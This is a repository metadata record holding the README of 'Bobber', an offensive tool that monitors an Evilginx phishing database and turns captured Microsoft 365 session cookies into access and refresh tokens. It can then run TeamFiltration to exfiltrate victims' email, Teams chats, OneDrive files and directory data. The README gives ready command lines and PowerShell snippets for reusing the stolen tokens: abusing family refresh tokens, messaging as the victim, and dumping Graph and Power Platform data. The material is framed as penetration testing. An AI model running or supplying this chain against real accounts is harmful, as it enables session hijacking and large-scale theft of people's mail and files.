{"id":18831762,"url":"https://github.com/flangvik/bobber","last_synced_at":"2025-05-08T23:48:43.402Z","repository":{"id":205966384,"uuid":"710491712","full_name":"Flangvik/Bobber","owner":"Flangvik","description":"Bounces when a fish bites - Evilginx database monitoring with exfiltration automation","archived":false,"fork":false,"pushed_at":"2024-06-09T11:19:46.000Z","size":99,"stargazers_count":168,"open_issues_count":0,"forks_count":14,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-08T23:48:35.971Z","etag":null,"topics":["aad","entraid","evilginx","exfiltration","o365","pentesting","phishing","python","roadtools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-26T20:00:49.000Z","updated_at":"2025-04-29T04:01:45.000Z","dependencies_parsed_at":"2024-06-09T12:42:46.061Z","dependency_job_id":null,"html_url":"https://github.com/Flangvik/Bobber","commit_stats":null,"previous_names":["flangvik/bobber"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/Bobber/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253166477,"owners_count":21864467,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aad","entraid","evilginx","exfiltration","o365","pentesting","phishing","python","roadtools"],"created_at":"2024-11-08T01:55:55.080Z","updated_at":"2025-05-08T23:48:43.377Z","avatar_url":"https://github.com/Flangvik.png","language":"Python","readme":"# Bobber - Bounces when a fish bites!\n```\n ▓▓ \n ▓▓▓ \n ▓▓ \n ▓▓▓ \n ▓▓ \n ▓▓▓ \n ▓▓ \n ▓▓▓ \n ▓▓ \n ▓▓▓ \n ░░░░░░░░░░░░░░░░░░█▓▓▓▓▓░░░░░░░░░░░░░ \n ░░░░░░░░ ▓▓▓█▓▓▓▓▓ ░░░░░░░░ \n ░░░░░░ ░░░░░░░░░░░░░▓▓▓▓▓▓█▓█▓▓▓░░░░░░ ░░░░░░ \n ░░░░░░ ░░░░░░ ▓▓█▓▓▓▓▓▓▓▓▓▓ ░░░░░░ ░░░░░ \n ░░░░░ ░░░░░ ░░░░░░░░░░▓▓▓▓█▓▓▓▓█▓▓▓░░ ░░░░░ ░░░░░ \n ░░░░░ ░░░░░ ░░░░░ ▓█▓▓▓▓█▓▓▓▓█▓▓ ░░░░░ ░░░░░ ░░░░░ \n░░░░░ ░░░░ ░░░░░ ░░░▒▓▓▓▓▓▓▓▓█▓▓▓▓ ░░░░░ ░░░░ ░░░░░ \n░░░░ ░░░░░ ░░░░ ░░░ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░ ░░░░░ ░░░░ \n ░░░░ ░░░░░ ░░░░░ ░░░░░▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░ ░░░░ \n ░░░░░ ░░░░░ ░░░░ ░░░░░░ ░░░░░ ░░ \n ░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░ ░░░ \n \n Bobber - Bounces when a fish bites!\n```\nBobber monitors a given Evilginx database file for changes, and if a valid Evilginx session complete with a captured Microsoft Office 365 cookie is found, Bobber will utilize the RoadTools RoadTX library to retrieve the access and refresh tokens for the user, then optionally trigger TeamFiltration to exfiltrate all the sweet, sweet loot. Bobber supports monitoring a local file path or a file path on a remote host through SSH.\n\nBobber accepts a number of input arguments to adjust the RoadTools interactive auth flow, selection between key and credential-based SSH auth, as well as the added benefit of receiving pushover notifications once a user submits their credentials and the loot is on the way.\n\nCheckout the TrustedSec Blogpost [The Triforce of Initial Access](https://trustedsec.com/blog/the-triforce-of-initial-access), for more information \n\n```\nusage: bobber.py [-h] [--host HOST] [--port PORT] [--username USERNAME] [--password PASSWORD] [--key KEY]\n [--user-key USER_KEY] [--api-token API_TOKEN] [--all] [--aad] [--teams] [--onedrive] [--owa]\n [--owa-limit OWA_LIMIT] [--tf-path TF_PATH] [-c CLIENT] [-r RESOURCE] [-s SCOPE] [-ru URL]\n [-t TENANT] [-d DRIVER_PATH] [-k]\n database_path\n\npositional arguments:\n database_path Path to the local OR remote Evilginx database file.\n\noptions:\n -h, --help show this help message and exit\n\nSSH Options:\n Evilginx database monitoring SSH options\n\n --host HOST SSH hostname/IP when fetching from a remote host.\n --port PORT SSH port when fetching from a remote host.\n --username USERNAME SSH username when fetching from a remote host.\n --password PASSWORD SSH password when fetching from a remote host.\n --key KEY Path to the SSH private key file for authentication.\n\nPushover Options:\n Pushover notifications options\n\n --user-key USER_KEY Pushover User Key\n --api-token API_TOKEN\n Pushover API Token\n\nTeamFiltration Options:\n Exfiltration options for TeamFiltration\n\n --all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)\n --aad Exfiltrate information from Graph API (domain users and groups)\n --teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)\n --onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the user's entire OneDrive directory)\n --owa Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received)\n --owa-limit OWA_LIMIT\n Set the max amount of emails to exfiltrate, default is 2k.\n --tf-path TF_PATH Path to your TeamFiltration file on disk (download from https://github.com/Flangvik/TeamFiltration/releases/latest)\n\nRoadTools Options:\n RoadTools RoadTX interactive authentication options\n\n -c CLIENT, --client CLIENT\n Client ID (application ID / GUID ) to use when authenticating (Teams Client by default)\n -r RESOURCE, --resource RESOURCE\n Resource to authenticate to. Either a full URL or alias (list with roadtx listaliases)\n -s SCOPE, --scope SCOPE\n Scope to use. Will automatically switch to v2.0 auth endpoint if specified. If unsure use -r instead.\n -ru URL, --redirect-url URL\n Redirect URL used when authenticating (default: https://login.microsoftonline.com/common/oauth2/nativeclient)\n -t TENANT, --tenant TENANT\n Tenant ID or domain to auth to\n -d DRIVER_PATH, --driver-path DRIVER_PATH\n Path to geckodriver file on disk (download from: https://github.com/mozilla/geckodriver/releases/latest)\n -k, --keep-open Do not close the browser window after timeout. Useful if you want to browse online apps with the obtained credentials\n```\n# Setup\n\n1. `git clone https://github.com/Flangvik/Bobber`\n2. `pip install -r requirements.txt`\n3. Download the latest version of [TeamFiltration](https://github.com/Flangvik/TeamFiltration/releases/latest) for your platform, and place the binary inside the Bobber folder (Optional)\n4. Download the latest version of [Geckodriver](https://github.com/mozilla/geckodriver/releases) for your platform, and place the binary inside the Bobber folder\n5. `python3 Bobber.py --help` and get going!\n\n# Example Usage\n\nMonitor a remote file for changes via SSH, authenticate using your default ssh key (~/.ssh/id_rsa), keep the browser session open after RoadTools has exchanged captured cookie for JWT tokens, and exfiltrate only AAD Users and Groups data from the Graph API\n```powershell\npython bobber.py \"/root/.evilginx/data.db\" --username root --host 1337.66.69.420 --keep-open --aad\n```\n\nMonitor a local file for changes, exchange captured cookies for JWT token, and exfiltrate only emails.\n```powershell\npython bobber.py evilginx_data.db --host 1337.66.69.420 --owa \n```\n\nMonitor a remote file for changes over SSH, authenticate using username and password, exchange captured cookies for JWT tokens, and exfiltrate all data available.\n```powershell\npython bobber.py \"/root/.evilginx/data.db\" --username root --password 'MySuperPass123!' --all\n```\n\n\n# Usage with other tools\nWhen Bobber captures a complete Evilginx session, tokens retrieved using RoadTools will be stored in a file using the following naming convention `.sanitized_email_roadtools_auth`. This file can be used in combination with many other tools besides TeamFiltration. Here are a few examples from the context of a PowerShell prompt.\n\n### AADInternals\n[AADInternals](https://aadinternals.com/aadinternals/#introduction) is an Modular powershell-framework for exploring the pathways your access might have, created by my favorite finnish person [@DrAzureAD](https://twitter.com/DrAzureAD)\n\n```powershell\n#Read and parse the RoadTools auth file into a JSON object\n$roadToolsAuth = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Add the token information from RoadTools to the cache so it will be used for auth\nAdd-AADIntAccessTokenToCache -AccessToken $roadToolsAuth.accessToken -RefreshToken $roadToolsAuth.refreshToken\n\n#Read Teams messages from the GraphAPI\nGet-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName\n\n# Send a Teams message to an a user using the GraphAPI\nSend-AADIntTeamsMessage -Recipients \"bruce.wayne@example.com\" -Message \"Hello there, BATMAN!\"\n\n#Abuse [Family Refresh Tokens](https://github.com/secureworks/family-of-client-ids-research#abusing-family-refresh-tokens-for-unauthorized-access-and-persistence-in-azure-active-directory) to refresh as the the \"Microsoft Azure PowerShell\" Application (1950a258-227b-4e31-a9cf-717495945fc2). Obtains an access token with a different scope.\n$msAzJWT =Get-AADIntAccessTokenWithRefreshToken -ClientId \"1950a258-227b-4e31-a9cf-717495945fc2\" -Resource \"https://graph.microsoft.com\" -TenantId $roadToolsAuth.tenantId -RefreshToken $roadToolsAuth.refreshToken -SaveToCache 1 -IncludeRefreshToken 1\n```\n\n### AzureHound\n[AzureHound](https://github.com/BloodHoundAD/AzureHound) is a BloodHound data collector for Microsoft Azure, from the great people over at [@SpecterOps](https://twitter.com/SpecterOps)\n\n```powershell\n#Read and parse RoadTools auth file into a JSON object\n$roadToolsAuth = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Use the refresh token and tenantId to run AzureHound against the tenant\n./azurehound.exe -r $roadToolsAuth.refreshToken -t $roadToolsAuth.tenantId list -o output.json\n```\n\n### GraphRunner\n[GraphRunner](https://github.com/dafthack/GraphRunner) Powershell-based post-exploitation toolset for interacting with the Microsoft Graph API, by [@dafthack](https://twitter.com/dafthack)\n```powershell\n#Import GraphRunner\nImport-Module .\\GraphRunner.ps1\n\n#Read and parse RoadTools auth file into a JSON object\n#While the JSON object of roadtools does not match what GraphRunner needs, enough properties match to \"trick\" GraphRunner into allowing us to run RefreshGraphTokens\n$tokens = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Run RefreshGraphTokens to update our $tokens var \nInvoke-RefreshGraphTokens -RefreshToken $roadToolsAuth.refreshToken -tenantid $roadToolsAuth.tenantId\n\n#Most common command to dump a series of information from the Graph API\nInvoke-GraphRunner -Tokens $tokens\n```\n\n\n### Power-Pwn\n[Power-Pwn](https://github.com/mbrg/power-pwn) in Python-based offensive security toolset for targeting the Microsoft 365 Power Platform, by [@mbrg0](https://twitter.com/mbrg0)\n```powershell\n#Read and parse RoadTools auth file into a JSON object\n$roadToolsAuth = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Create tokens.json in the same directory you are running powerpwn.exe from\n@{cli_refresh_token = $roadToolsAuth.refreshToken } | ConvertTo-Json | Set-Content -Path 'tokens.json'\n\n#Perform recon of possible Power Platform deployments\n./powerpwn.exe recon -t $roadToolsAuth.tenantId\n\n#Dump data from found Power Platform deployments\n./powerpwn.exe dump -t $roadToolsAuth.tenantId\n```\n\n# Todo\n- [ ] Add an option to specify a proxy URL for token retrieval and exfiltration\n- [ ] Allow for capture and notification for other username + password + cookie combinations (then only O365)\n- [ ] Options to get Pushover notifications even if only username + password was captured (no cookie)\n\n# Credits\n- [@_dirkjan](https://twitter.com/_dirkjan) for the amazing work that is [RoadTools](https://github.com/dirkjanm/ROADtools) \n- [mrgretzky](https://twitter.com/mrgretzky) for raising the standard of phishing simulation with the [evilginx2](https://github.com/kgretzky/evilginx2) toolkit\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fbobber","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflangvik%2Fbobber","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fbobber/lists"}